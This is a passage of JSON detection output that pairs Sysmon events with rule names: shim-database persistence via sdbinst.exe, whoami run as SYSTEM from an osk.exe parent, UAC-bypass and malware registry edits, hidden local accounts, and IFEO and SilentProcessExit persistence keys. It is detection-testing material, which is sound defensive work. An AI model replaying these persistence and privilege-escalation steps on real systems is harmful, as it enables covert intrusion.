(win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E8-5C91-0000-001037DF0700","ProcessId":4052,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:44.712"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966408,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:44.792182Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E9-5C91-0000-00102EEB0700","ProcessId":2104,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:45.052"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966423,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:45.162715Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-5689-5C91-0000-0010543F0800","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:25.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966429,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:25.933892Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-568A-5C91-0000-0010D24B0800","ProcessId":4072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:26.194"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966444,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:26.364512Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-001012610800","ProcessId":2548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:47.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966449,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.124363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-0010D96C0800","ProcessId":3140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:47.364"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966464,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.474867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Users\\user01\\Desktop\\titi.sdb\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\user01\\Desktop\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-57EC-5C91-0000-001097810900","ProcessId":2848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:58:20.894"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966480,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:20.994444Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-528D-5C91-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"c:\\osk.exe\" ","ParentImage":"C:\\osk.exe","ParentProcessGuid":"365ABB72-57FB-5C91-0000-00104FD40900","ParentProcessId":2128,"ProcessGuid":"365ABB72-5804-5C91-0000-001044DE0900","ProcessId":2456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-03-19 
20:58:44.187"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966501,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:44.237867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966533,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966534,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 
21:20:35.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966535,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:35.603518Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"%%ProgramFiles%%\\Windows NT\\Accessories\\WORDPAD.EXE\" \"%%1\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106_CLASSES\\sdb_auto_file\\shell\\open\\command\\(Default)","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966543,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"WORDPAD.EXE","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sdb\\OpenWithList\\a","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966544,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-777F-5C91-0000-0010B95B0000","ProcessId":524,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 23:13:04.090"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966594,"Execution_attributes":{"ProcessID":988,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:18:50.627750Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local 
Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 09:28:22.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134365,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T09:28:22.280355Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 
10:03:04.489"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134385,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:03:04.489480Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\sqlsvc\\(Default)","UtcTime":"2020-09-04 10:33:31.842"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134399,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:33:31.843489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or 
Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:54:22.973"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134408,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:54:22.974353Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 11:00:24.601"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134411,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T11:00:24.602530Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000200)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F5D-5D0A-0000-00109B331300","ProcessId":1356,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\GlobalFlag","UtcTime":"2019-06-19 17:22:41.709"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8034,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:41.709638Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F61-5D0A-0000-0010DB351300","ProcessId":2504,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\ReportingMode","UtcTime":"2019-06-19 17:22:43.912"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8036,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:43.944013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence 
